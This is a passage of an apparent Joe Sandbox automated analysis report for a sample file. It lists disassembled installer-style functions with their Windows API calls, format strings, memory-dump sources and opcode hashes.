                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                                                            • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                                                            • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                                            • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                                                            Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                                                            Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                                                            Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                                                            • String ID: !
                                                                                                                                                                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                                                            Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                                                            Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                                                            • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                                                            • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                                                                            Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                                                            • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                                                                            Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                                                            • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                                                                            Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                                                            • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                                                                            Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425D19,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
